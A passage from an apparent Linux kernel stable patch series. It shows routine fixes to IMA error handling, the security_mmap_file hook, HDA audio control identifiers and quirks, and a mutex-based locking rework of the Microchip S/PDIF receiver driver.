+ plugin_cxxflags	= -Wp,-MMD,$(depfile) $(KBUILD_HOSTCXXFLAGS) -fPIC \
+ 		  -include $(srctree)/include/linux/compiler-version.h \
+ 		  -DPLUGIN_VERSION=$(call stringify,$(KERNELVERSION)) \
+-		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) -std=gnu++11 \
++		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) \
+ 		  -fno-rtti -fno-exceptions -fasynchronous-unwind-tables \
+ 		  -ggdb -Wno-narrowing -Wno-unused-variable \
+ 		  -Wno-format-diag
+diff --git a/scripts/package/mkdebian b/scripts/package/mkdebian
+index a3ac5a716e9fc..5be7e627e7513 100755
+--- a/scripts/package/mkdebian
++++ b/scripts/package/mkdebian
+@@ -236,7 +236,7 @@ binary-arch: build-arch
+ 	KBUILD_BUILD_VERSION=${revision} -f \$(srctree)/Makefile intdeb-pkg
+ 
+ clean:
+-	rm -rf debian/*tmp debian/files
++	rm -rf debian/files debian/linux-*
+ 	\$(MAKE) clean
+ 
+ binary: binary-arch
+diff --git a/security/integrity/ima/ima_api.c b/security/integrity/ima/ima_api.c
+index c1e76282b5ee5..1e3a7a4f8833f 100644
+--- a/security/integrity/ima/ima_api.c
++++ b/security/integrity/ima/ima_api.c
+@@ -292,7 +292,7 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 		result = ima_calc_file_hash(file, &hash.hdr);
+ 	}
+ 
+-	if (result == -ENOMEM)
++	if (result && result != -EBADF && result != -EINVAL)
+ 		goto out;
+ 
+ 	length = sizeof(hash.hdr) + hash.hdr.length;
+diff --git a/security/integrity/ima/ima_main.c b/security/integrity/ima/ima_main.c
+index 4a207a3ef7ef3..bc84a0ac25aaa 100644
+--- a/security/integrity/ima/ima_main.c
++++ b/security/integrity/ima/ima_main.c
+@@ -335,7 +335,7 @@ static int process_measurement(struct file *file, const struct cred *cred,
+ 	hash_algo = ima_get_hash_algo(xattr_value, xattr_len);
+ 
+ 	rc = ima_collect_measurement(iint, file, buf, size, hash_algo, modsig);
+-	if (rc == -ENOMEM)
++	if (rc != 0 && rc != -EBADF && rc != -EINVAL)
+ 		goto out_locked;
+ 
+ 	if (!pathbuf)	/* ima_rdwr_violation possibly pre-fetched */
+@@ -395,7 +395,9 @@ out:
+ /**
+  * ima_file_mmap - based on policy, collect/store measurement.
+  * @file: pointer to the file to be measured (May be NULL)
+- * @prot: contains the protection that will be applied by the kernel.
++ * @reqprot: protection requested by the application
++ * @prot: protection that will be applied by the kernel
++ * @flags: operational flags
+  *
+  * Measure files being mmapped executable based on the ima_must_measure()
+  * policy decision.
+@@ -403,7 +405,8 @@ out:
+  * On success return 0.  On integrity appraisal error, assuming the file
+  * is in policy and IMA-appraisal is in enforcing mode, return -EACCES.
+  */
+-int ima_file_mmap(struct file *file, unsigned long prot)
++int ima_file_mmap(struct file *file, unsigned long reqprot,
++		  unsigned long prot, unsigned long flags)
+ {
+ 	u32 secid;
+ 
+diff --git a/security/security.c b/security/security.c
+index 79d82cb6e4696..75dc0947ee0cf 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -1591,12 +1591,13 @@ static inline unsigned long mmap_prot(struct file *file, unsigned long prot)
+ int security_mmap_file(struct file *file, unsigned long prot,
+ 			unsigned long flags)
+ {
++	unsigned long prot_adj = mmap_prot(file, prot);
+ 	int ret;
+-	ret = call_int_hook(mmap_file, 0, file, prot,
+-					mmap_prot(file, prot), flags);
++
++	ret = call_int_hook(mmap_file, 0, file, prot, prot_adj, flags);
+ 	if (ret)
+ 		return ret;
+-	return ima_file_mmap(file, prot);
++	return ima_file_mmap(file, prot, prot_adj, flags);
+ }
+ 
+ int security_mmap_addr(unsigned long addr)
+diff --git a/sound/pci/hda/Kconfig b/sound/pci/hda/Kconfig
+index a8e8cf98befa1..d29d8372a3c04 100644
+--- a/sound/pci/hda/Kconfig
++++ b/sound/pci/hda/Kconfig
+@@ -302,6 +302,20 @@ config SND_HDA_INTEL_HDMI_SILENT_STREAM
+ 	  This feature can impact power consumption as resources
+ 	  are kept reserved both at transmitter and receiver.
+ 
++config SND_HDA_CTL_DEV_ID
++	bool "Use the device identifier field for controls"
++	depends on SND_HDA_INTEL
++	help
++	  Say Y to use the device identifier field for (mixer)
++	  controls (the old behaviour, before this option was available).
++
++	  When enabled, multiple HDA codecs may set the device
++	  field in control (mixer) element identifiers. The use of this
++	  field is neither recommended nor defined for mixer controls.
++
++	  The old behaviour (Y) is obsolete and will be removed. Consider
++	  leaving this option disabled.
++
+ endif
+ 
+ endmenu
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index 2e728aad67713..9f79c0ac2bda7 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -3389,7 +3389,12 @@ int snd_hda_add_new_ctls(struct hda_codec *codec,
+ 			kctl = snd_ctl_new1(knew, codec);
+ 			if (!kctl)
+ 				return -ENOMEM;
+-			if (addr > 0)
++			/* Do not use the id.device field for MIXER elements.
++			 * This field is for real device numbers (like PCM) but codecs
++			 * are components hidden from the user-space view (unrelated
++			 * to the mixer element identification).
++			 */
++			if (addr > 0 && codec->ctl_dev_id)
+ 				kctl->id.device = addr;
+ 			if (idx > 0)
+ 				kctl->id.index = idx;
+@@ -3400,9 +3405,11 @@ int snd_hda_add_new_ctls(struct hda_codec *codec,
+ 			 * the codec addr; if it still fails (or it's the
+ 			 * primary codec), then try another control index
+ 			 */
+-			if (!addr && codec->core.addr)
++			if (!addr && codec->core.addr) {
+ 				addr = codec->core.addr;
+-			else if (!idx && !knew->index) {
++				if (!codec->ctl_dev_id)
++					idx += 10 * addr;
++			} else if (!idx && !knew->index) {
+ 				idx = find_empty_mixer_ctl_idx(codec,
+ 							       knew->name, 0);
+ 				if (idx <= 0)
+diff --git a/sound/pci/hda/hda_controller.c b/sound/pci/hda/hda_controller.c
+index 0ff286b7b66be..083df287c1a48 100644
+--- a/sound/pci/hda/hda_controller.c
++++ b/sound/pci/hda/hda_controller.c
+@@ -1231,6 +1231,7 @@ int azx_probe_codecs(struct azx *chip, unsigned int max_slots)
+ 				continue;
+ 			codec->jackpoll_interval = chip->jackpoll_interval;
+ 			codec->beep_mode = chip->beep_mode;
++			codec->ctl_dev_id = chip->ctl_dev_id;
+ 			codecs++;
+ 		}
+ 	}
+diff --git a/sound/pci/hda/hda_controller.h b/sound/pci/hda/hda_controller.h
+index f5bf295eb8307..8556031bcd68e 100644
+--- a/sound/pci/hda/hda_controller.h
++++ b/sound/pci/hda/hda_controller.h
+@@ -124,6 +124,7 @@ struct azx {
+ 	/* HD codec */
+ 	int  codec_probe_mask; /* copied from probe_mask option */
+ 	unsigned int beep_mode;
++	bool ctl_dev_id;
+ 
+ #ifdef CONFIG_SND_HDA_PATCH_LOADER
+ 	const struct firmware *fw;
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 87002670c0c92..81c4a45254ff2 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -50,6 +50,7 @@
+ #include <sound/intel-dsp-config.h>
+ #include <linux/vgaarb.h>
+ #include <linux/vga_switcheroo.h>
++#include <linux/apple-gmux.h>
+ #include <linux/firmware.h>
+ #include <sound/hda_codec.h>
+ #include "hda_controller.h"
+@@ -119,6 +120,7 @@ static bool beep_mode[SNDRV_CARDS] = {[0 ... (SNDRV_CARDS-1)] =
+ 					CONFIG_SND_HDA_INPUT_BEEP_MODE};
+ #endif
+ static bool dmic_detect = 1;
++static bool ctl_dev_id = IS_ENABLED(CONFIG_SND_HDA_CTL_DEV_ID) ? 1 : 0;
+ 
+ module_param_array(index, int, NULL, 0444);
+ MODULE_PARM_DESC(index, "Index value for Intel HD audio interface.");
+@@ -157,6 +159,8 @@ module_param(dmic_detect, bool, 0444);
+ MODULE_PARM_DESC(dmic_detect, "Allow DSP driver selection (bypass this driver) "
+ 			     "(0=off, 1=on) (default=1); "
+ 		 "deprecated, use snd-intel-dspcfg.dsp_driver option instead");
++module_param(ctl_dev_id, bool, 0444);
++MODULE_PARM_DESC(ctl_dev_id, "Use control device identifier (based on codec address).");
+ 
+ #ifdef CONFIG_PM
+ static int param_set_xint(const char *val, const struct kernel_param *kp);
+@@ -1463,7 +1467,7 @@ static struct pci_dev *get_bound_vga(struct pci_dev *pci)
+ 				 * vgaswitcheroo.
+ 				 */
+ 				if (((p->class >> 16) == PCI_BASE_CLASS_DISPLAY) &&
+-				    atpx_present())
++				    (atpx_present() || apple_gmux_detect(NULL, NULL)))
+ 					return p;
+ 				pci_dev_put(p);
+ 			}
+@@ -2278,6 +2282,8 @@ static int azx_probe_continue(struct azx *chip)
+ 	chip->beep_mode = beep_mode[dev];
+ #endif
+ 
++	chip->ctl_dev_id = ctl_dev_id;
++
+ 	/* create codec instances */
+ 	if (bus->codec_mask) {
+ 		err = azx_probe_codecs(chip, azx_max_codecs[chip->driver_type]);
+diff --git a/sound/pci/hda/patch_ca0132.c b/sound/pci/hda/patch_ca0132.c
+index 0a292bf271f2e..acde4cd58785e 100644
+--- a/sound/pci/hda/patch_ca0132.c
++++ b/sound/pci/hda/patch_ca0132.c
+@@ -2455,7 +2455,7 @@ static int dspio_set_uint_param(struct hda_codec *codec, int mod_id,
+ static int dspio_alloc_dma_chan(struct hda_codec *codec, unsigned int *dma_chan)
+ {
+ 	int status = 0;
+-	unsigned int size = sizeof(dma_chan);
++	unsigned int size = sizeof(*dma_chan);
+ 
+ 	codec_dbg(codec, "     dspio_alloc_dma_chan() -- begin\n");
+ 	status = dspio_scp(codec, MASTERCONTROL, 0x20,
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e103bb3693c06..d4819890374b5 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11617,6 +11617,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1028, 0x0698, "Dell", ALC668_FIXUP_DELL_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x069f, "Dell", ALC668_FIXUP_DELL_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x1632, "HP RP5800", ALC662_FIXUP_HP_RP5800),
++	SND_PCI_QUIRK(0x103c, 0x870c, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x8719, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x873e, "HP", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x877e, "HP 288 Pro G6", ALC671_FIXUP_HP_HEADSET_MIC2),
+diff --git a/sound/pci/ice1712/aureon.c b/sound/pci/ice1712/aureon.c
+index 9a30f6d35d135..40a0e00950301 100644
+--- a/sound/pci/ice1712/aureon.c
++++ b/sound/pci/ice1712/aureon.c
+@@ -1892,6 +1892,7 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 		unsigned char id;
+ 		snd_ice1712_save_gpio_status(ice);
+ 		id = aureon_cs8415_get(ice, CS8415_ID);
++		snd_ice1712_restore_gpio_status(ice);
+ 		if (id != 0x41)
+ 			dev_info(ice->card->dev,
+ 				 "No CS8415 chip. Skipping CS8415 controls.\n");
+@@ -1909,7 +1910,6 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 					kctl->id.device = ice->pcm->device;
+ 			}
+ 		}
+-		snd_ice1712_restore_gpio_status(ice);
+ 	}
+ 
+ 	return 0;
+diff --git a/sound/soc/atmel/mchp-spdifrx.c b/sound/soc/atmel/mchp-spdifrx.c
+index ec0705cc40fab..76ce37f641ebd 100644
+--- a/sound/soc/atmel/mchp-spdifrx.c
++++ b/sound/soc/atmel/mchp-spdifrx.c
+@@ -217,7 +217,6 @@ struct mchp_spdifrx_ch_stat {
+ struct mchp_spdifrx_user_data {
+ 	unsigned char data[SPDIFRX_UD_BITS / 8];
+ 	struct completion done;
+-	spinlock_t lock;	/* protect access to user data */
+ };
+ 
+ struct mchp_spdifrx_mixer_control {
+@@ -231,13 +230,13 @@ struct mchp_spdifrx_mixer_control {
+ struct mchp_spdifrx_dev {
+ 	struct snd_dmaengine_dai_dma_data	capture;
+ 	struct mchp_spdifrx_mixer_control	control;
+-	spinlock_t				blockend_lock;	/* protect access to blockend_refcount */
+-	int					blockend_refcount;
++	struct mutex				mlock;
+ 	struct device				*dev;
+ 	struct regmap				*regmap;
+ 	struct clk				*pclk;
+ 	struct clk				*gclk;
+ 	unsigned int				fmt;
++	unsigned int				trigger_enabled;
+ 	unsigned int				gclk_enabled:1;
+ };
+ 
+@@ -275,37 +274,11 @@ static void mchp_spdifrx_channel_user_data_read(struct mchp_spdifrx_dev *dev,
+ 	}
+ }
+ 
+-/* called from non-atomic context only */
+-static void mchp_spdifrx_isr_blockend_en(struct mchp_spdifrx_dev *dev)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&dev->blockend_lock, flags);
+-	dev->blockend_refcount++;
+-	/* don't enable BLOCKEND interrupt if it's already enabled */
+-	if (dev->blockend_refcount == 1)
+-		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_BLOCKEND);
+-	spin_unlock_irqrestore(&dev->blockend_lock, flags);
+-}
+-
+-/* called from atomic/non-atomic context */
+-static void mchp_spdifrx_isr_blockend_dis(struct mchp_spdifrx_dev *dev)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&dev->blockend_lock, flags);
+-	dev->blockend_refcount--;
+-	/* don't enable BLOCKEND interrupt if it's already enabled */
+-	if (dev->blockend_refcount == 0)
+-		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
+-	spin_unlock_irqrestore(&dev->blockend_lock, flags);
+-}
+-
+ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ {
+ 	struct mchp_spdifrx_dev *dev = dev_id;
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+-	u32 sr, imr, pending, idr = 0;
++	u32 sr, imr, pending;
+ 	irqreturn_t ret = IRQ_NONE;
+ 	int ch;
+ 
+@@ -320,13 +293,10 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 
+ 	if (pending & SPDIFRX_IR_BLOCKEND) {
+ 		for (ch = 0; ch < SPDIFRX_CHANNELS; ch++) {
+-			spin_lock(&ctrl->user_data[ch].lock);
+ 			mchp_spdifrx_channel_user_data_read(dev, ch);
+-			spin_unlock(&ctrl->user_data[ch].lock);
+-
+ 			complete(&ctrl->user_data[ch].done);
+ 		}
+-		mchp_spdifrx_isr_blockend_dis(dev);
++		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+@@ -334,7 +304,7 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 		if (pending & SPDIFRX_IR_CSC(ch)) {
+ 			mchp_spdifrx_channel_status_read(dev, ch);
+ 			complete(&ctrl->ch_stat[ch].done);
+-			idr |= SPDIFRX_IR_CSC(ch);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_CSC(ch));
+ 			ret = IRQ_HANDLED;
+ 		}
+ 	}
+@@ -344,8 +314,6 @@ static irqreturn_t mchp_spdif_interrupt(int irq, void *dev_id)
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+-	regmap_write(dev->regmap, SPDIFRX_IDR, idr);
+-
+ 	return ret;
+ }
+ 
+@@ -353,47 +321,40 @@ static int mchp_spdifrx_trigger(struct snd_pcm_substream *substream, int cmd,
+ 				struct snd_soc_dai *dai)
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+-	u32 mr;
+-	int running;
+-	int ret;
+-
+-	regmap_read(dev->regmap, SPDIFRX_MR, &mr);
+-	running = !!(mr & SPDIFRX_MR_RXEN_ENABLE);
++	int ret = 0;
+ 
+ 	switch (cmd) {
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		if (!running) {
+-			mr &= ~SPDIFRX_MR_RXEN_MASK;
+-			mr |= SPDIFRX_MR_RXEN_ENABLE;
+-			/* enable overrun interrupts */
+-			regmap_write(dev->regmap, SPDIFRX_IER,
+-				     SPDIFRX_IR_OVERRUN);
+-		}
++		mutex_lock(&dev->mlock);
++		/* Enable overrun interrupts */
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_OVERRUN);
++
++		/* Enable receiver. */
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_ENABLE);
++		dev->trigger_enabled = true;
++		mutex_unlock(&dev->mlock);
+ 		break;
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_SUSPEND:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		if (running) {
+-			mr &= ~SPDIFRX_MR_RXEN_MASK;
+-			mr |= SPDIFRX_MR_RXEN_DISABLE;
+-			/* disable overrun interrupts */
+-			regmap_write(dev->regmap, SPDIFRX_IDR,
+-				     SPDIFRX_IR_OVERRUN);
+-		}
++		mutex_lock(&dev->mlock);
++		/* Disable overrun interrupts */
++		regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_OVERRUN);
++
++		/* Disable receiver. */
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_DISABLE);
++		dev->trigger_enabled = false;
++		mutex_unlock(&dev->mlock);
+ 		break;
+ 	default:
+-		return -EINVAL;
+-	}
+-
+-	ret = regmap_write(dev->regmap, SPDIFRX_MR, mr);
+-	if (ret) {
+-		dev_err(dev->dev, "unable to enable/disable RX: %d\n", ret);
+-		return ret;
++		ret = -EINVAL;
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+@@ -401,7 +362,7 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 				  struct snd_soc_dai *dai)
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+-	u32 mr;
++	u32 mr = 0;
+ 	int ret;
+ 
+ 	dev_dbg(dev->dev, "%s() rate=%u format=%#x width=%u channels=%u\n",
+@@ -413,13 +374,6 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
+-	regmap_read(dev->regmap, SPDIFRX_MR, &mr);
+-
+-	if (mr & SPDIFRX_MR_RXEN_ENABLE) {
+-		dev_err(dev->dev, "PCM already running\n");
+-		return -EBUSY;
+-	}
+-
+ 	if (params_channels(params) != SPDIFRX_CHANNELS) {
+ 		dev_err(dev->dev, "unsupported number of channels: %d\n",
+ 			params_channels(params));
+@@ -445,6 +399,13 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
++	mutex_lock(&dev->mlock);
++	if (dev->trigger_enabled) {
++		dev_err(dev->dev, "PCM already running\n");
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	if (dev->gclk_enabled) {
+ 		clk_disable_unprepare(dev->gclk);
+ 		dev->gclk_enabled = 0;
+@@ -455,19 +416,24 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		dev_err(dev->dev,
+ 			"unable to set gclk min rate: rate %u * ratio %u + 1\n",
+ 			params_rate(params), SPDIFRX_GCLK_RATIO_MIN);
+-		return ret;
++		goto unlock;
+ 	}
+ 	ret = clk_prepare_enable(dev->gclk);
+ 	if (ret) {
+ 		dev_err(dev->dev, "unable to enable gclk: %d\n", ret);
+-		return ret;
++		goto unlock;
+ 	}
+ 	dev->gclk_enabled = 1;
+ 
+ 	dev_dbg(dev->dev, "GCLK range min set to %d\n",
+ 		params_rate(params) * SPDIFRX_GCLK_RATIO_MIN + 1);
+ 
+-	return regmap_write(dev->regmap, SPDIFRX_MR, mr);
++	ret = regmap_write(dev->regmap, SPDIFRX_MR, mr);
++
++unlock:
++	mutex_unlock(&dev->mlock);
++
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_hw_free(struct snd_pcm_substream *substream,
+@@ -475,10 +441,12 @@ static int mchp_spdifrx_hw_free(struct snd_pcm_substream *substream,
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 
++	mutex_lock(&dev->mlock);
+ 	if (dev->gclk_enabled) {
+ 		clk_disable_unprepare(dev->gclk);
+ 		dev->gclk_enabled = 0;
+ 	}
++	mutex_unlock(&dev->mlock);
+ 	return 0;
+ }
+ 
+@@ -515,22 +483,51 @@ static int mchp_spdifrx_cs_get(struct mchp_spdifrx_dev *dev,
+ {
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+ 	struct mchp_spdifrx_ch_stat *ch_stat = &ctrl->ch_stat[channel];
+-	int ret;
+-
+-	regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_CSC(channel));
+-	/* check for new data available */
+-	ret = wait_for_completion_interruptible_timeout(&ch_stat->done,
+-							msecs_to_jiffies(100));
+-	/* IP might not be started or valid stream might not be present */
+-	if (ret < 0) {
+-		dev_dbg(dev->dev, "channel status for channel %d timeout\n",
+-			channel);
++	int ret = 0;
++
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * We may reach this point with both clocks enabled but the receiver
++	 * still disabled. To avoid waiting for completion only to return
++	 * with a timeout, check dev->trigger_enabled.
++	 *
++	 * To retrieve data:
++	 * - if the receiver is enabled, the CSC IRQ will update the data in
++	 *   the software caches (ch_stat->data)
++	 * - otherwise we just update the software caches here with the
++	 *   latest available information and return it; in this case we
++	 *   don't need spin locking as the IRQ is disabled and will not be
++	 *   raised from anywhere else.
++	 */
++
++	if (dev->trigger_enabled) {
++		reinit_completion(&ch_stat->done);
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_CSC(channel));
++		/* Check for new data available */
++		ret = wait_for_completion_interruptible_timeout(&ch_stat->done,
++								msecs_to_jiffies(100));
++		/* Valid stream might not be present */
++		if (ret <= 0) {
++			dev_dbg(dev->dev, "channel status for channel %d timeout\n",
++				channel);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_CSC(channel));
++			ret = ret ? : -ETIMEDOUT;
++			goto unlock;
++		} else {
++			ret = 0;
++		}
++	} else {
++		/* Update software cache with latest channel status. */
++		mchp_spdifrx_channel_status_read(dev, channel);
+ 	}
+ 
+ 	memcpy(uvalue->value.iec958.status, ch_stat->data,
+ 	       sizeof(ch_stat->data));
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&dev->mlock);
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_cs1_get(struct snd_kcontrol *kcontrol,
+@@ -564,29 +561,49 @@ static int mchp_spdifrx_subcode_ch_get(struct mchp_spdifrx_dev *dev,
+ 				       int channel,
+ 				       struct snd_ctl_elem_value *uvalue)
+ {
+-	unsigned long flags;
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+ 	struct mchp_spdifrx_user_data *user_data = &ctrl->user_data[channel];
+-	int ret;
+-
+-	reinit_completion(&user_data->done);
+-	mchp_spdifrx_isr_blockend_en(dev);
+-	ret = wait_for_completion_interruptible_timeout(&user_data->done,
+-							msecs_to_jiffies(100));
+-	/* IP might not be started or valid stream might not be present */
+-	if (ret <= 0) {
+-		dev_dbg(dev->dev, "user data for channel %d timeout\n",
+-			channel);
+-		mchp_spdifrx_isr_blockend_dis(dev);
+-		return ret;
++	int ret = 0;
++
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * We may reach this point with both clocks enabled but the receiver
++	 * still disabled. To avoid waiting for completion only to time out,
++	 * we check the dev->trigger_enabled flag here.
++	 *
++	 * To retrieve data:
++	 * - if the receiver is enabled, we need to wait for the blockend IRQ
++	 *   to read the data and update the software caches for us
++	 * - otherwise reading the SPDIFRX_CHUD() registers is enough.
++	 */
++
++	if (dev->trigger_enabled) {
++		reinit_completion(&user_data->done);
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_BLOCKEND);
++		ret = wait_for_completion_interruptible_timeout(&user_data->done,
++								msecs_to_jiffies(100));
++		/* Valid stream might not be present. */
++		if (ret <= 0) {
++			dev_dbg(dev->dev, "user data for channel %d timeout\n",
++				channel);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
++			ret = ret ? : -ETIMEDOUT;
++			goto unlock;
++		} else {
++			ret = 0;
++		}
++	} else {
++		/* Update software cache with last available data. */
++		mchp_spdifrx_channel_user_data_read(dev, channel);
+ 	}
+ 
+-	spin_lock_irqsave(&user_data->lock, flags);
+ 	memcpy(uvalue->value.iec958.subcode, user_data->data,
+ 	       sizeof(user_data->data));
+-	spin_unlock_irqrestore(&user_data->lock, flags);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&dev->mlock);
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_subcode_ch1_get(struct snd_kcontrol *kcontrol,
+@@ -627,10 +644,24 @@ static int mchp_spdifrx_ulock_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	bool ulock_old = ctrl->ulock;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->ulock = !(val & SPDIFRX_RSR_ULOCK);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK bit has a wrong value if both pclk and gclk are
++	 * enabled and the receiver is disabled. Thus we take
++	 * dev->trigger_enabled into account here to return the real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		ctrl->ulock = !(val & SPDIFRX_RSR_ULOCK);
++	} else {
++		ctrl->ulock = 0;
++	}
++
+ 	uvalue->value.integer.value[0] = ctrl->ulock;
+ 
++	mutex_unlock(&dev->mlock);
++
+ 	return ulock_old != ctrl->ulock;
+ }
+ 
+@@ -643,8 +674,22 @@ static int mchp_spdifrx_badf_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	bool badf_old = ctrl->badf;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->badf = !!(val & SPDIFRX_RSR_BADF);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK bit has a wrong value if both pclk and gclk are
++	 * enabled and the receiver is disabled. Thus we take
++	 * dev->trigger_enabled into account here to return the real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		ctrl->badf = !!(val & SPDIFRX_RSR_BADF);
++	} else {
++		ctrl->badf = 0;
++	}
++
++	mutex_unlock(&dev->mlock);
++
+ 	uvalue->value.integer.value[0] = ctrl->badf;
+ 
+ 	return badf_old != ctrl->badf;
+@@ -656,11 +701,48 @@ static int mchp_spdifrx_signal_get(struct snd_kcontrol *kcontrol,
+ 	struct snd_soc_dai *dai = snd_kcontrol_chip(kcontrol);
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+-	u32 val;
++	u32 val = ~0U, loops = 10;
++	int ret;
+ 	bool signal_old = ctrl->signal;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->signal = !(val & SPDIFRX_RSR_NOSIGNAL);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * To get the signal we need the receiver enabled. It may also be
++	 * enabled from the trigger() function, so we must take care not to
++	 * disable the receiver while it is running.
++	 */
++	if (!dev->trigger_enabled) {
++		ret = clk_prepare_enable(dev->gclk);
++		if (ret)
++			goto unlock;
++
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_ENABLE);
++
++		/* Wait for RSR.ULOCK bit. */
++		while (--loops) {
++			regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++			if (!(val & SPDIFRX_RSR_ULOCK))
++				break;
++			usleep_range(100, 150);
++		}
++
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_DISABLE);
++
++		clk_disable_unprepare(dev->gclk);
++	} else {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++	}
++
++unlock:
++	mutex_unlock(&dev->mlock);
++
++	if (!(val & SPDIFRX_RSR_ULOCK))
++		ctrl->signal = !(val & SPDIFRX_RSR_NOSIGNAL);
++	else
++		ctrl->signal = 0;
+ 	uvalue->value.integer.value[0] = ctrl->signal;
+ 
+ 	return signal_old != ctrl->signal;
+@@ -685,18 +767,32 @@ static int mchp_spdifrx_rate_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	int rate;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-
+-	/* if the receiver is not locked, ISF data is invalid */
+-	if (val & SPDIFRX_RSR_ULOCK || !(val & SPDIFRX_RSR_IFS_MASK)) {
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK bit has a wrong value if both pclk and gclk are
++	 * enabled and the receiver is disabled. Thus we take
++	 * dev->trigger_enabled into account here to return the real status.
++	 */
